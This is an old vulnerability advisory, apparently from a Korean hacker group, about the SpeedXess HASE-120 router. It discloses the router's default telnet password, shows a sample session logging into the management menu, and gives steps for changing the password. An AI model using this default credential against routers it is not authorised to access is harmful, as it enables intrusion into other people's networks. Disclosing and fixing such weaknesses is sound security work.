SpeedXess HASE-120(IPOA Router) Default 
password vulnerability 

 by Secret (sale2001@orgio.net) 
(WOWHACKER: http://www.wowhacker.com) 



-=Content=- 

Too many routers are exposed to default password 
problem, so I write this for the security of router. This 
is not for attack but security. I came to know many 
company use SpeedXess HASE-120 router, but they 
don't seem to be aware of this problem, or don't care. 

I happened to connect SpeedXess HASE-120 router 
one day. SpeedXess Hase-120 may be one of most 
routers ISPs supply. I could guess the default 
password easily. But they don't seem to care 
because the router is not considered as important. If 
you use default password of SpeedXess Hase-120 
router, change it now. 

[exploit]: 
The default password is easy for you to guess. Look 
at the text logo! And guess! The password 
is "speedxess". 


telnet Target 
(target: speedxess hase-120 router address) 

 ##### # # 
# # ##### ###### ###### ##### # # 
###### #### #### 
# # # # # # # # # # # # 
 ##### # # ##### ##### # # # ##### 
#### #### 
      # ##### # # # # # # # # # 
# # # # # # # # # # # # # # 
 ##### # ###### ###### ##### # # 
###### #### #### 

# # # ##### ####### # #### ### 
# # # # # # # ## # # # # 
# # # # # # # # # # # 
####### # # ##### ###### ##### # #### 
# # 
# # ####### # # # # # # 
# # # # # # # # # # # 
# # # # ##### ####### ##### ###### 
### 

SpeedXess HASE-120(IPOA Router) Application 
Start... 

Welcome to HASE-120(IPOA Router) Management 
Interface 


Enter Password: <------ master password input : 
speedxess 

HASE-120(I) - Main Menu 

[S] System 
[A] Atm interface 
[D] Dsl interface 
[E] Ethernet interface 
[I] IPOA interface 
[R] Router 
[X] eXit 


Enter Selection: X 
Do you want to exit? (Y)es, (N)o : YESSession End 
Connection closed by foreign host. 
[secret@secret:~]$ 

After connection, we can change the information 
through system menu including router setting value. 



[solution]: 
1. connect to your router. 
2. Put "S" 

HASE-120(I) - Main Menu 

[S] System 
[A] Atm interface 
[D] Dsl interface 
[E] Ethernet interface 
[I] IPOA interface 
[R] Router 
[X] eXit 

Enter Selection: S 


HASE-120(I) - Main Menu - System 

Firmware Version HASE-120-1101 
System Uptime(YYMMDDhhmmss) ??:??:??:??:??:?? 
Name of System Owned by Secret 
Contact Name Secret Secure Lab 
Location France 
Ethernet Address 00:00:??:??:??:14 
IP Address 211.xxx.xxx.xxx 
Subnet Mask 255.255.255.xxx 

[P] Password change 
[F] Firmware upgrade 
[S] Setting values 
[R] Reset system 
[I] rs-232 Interface 
[A] ARP table 
[X] eXit 

Enter Selection: 

3. Put "P" and then change the password. 


Enter Selection: P 

Enter New Password (up to 10 characters): 
Re-enter New Password: 
Recording Changes. This may take a while...Done 

Password is changed successfully.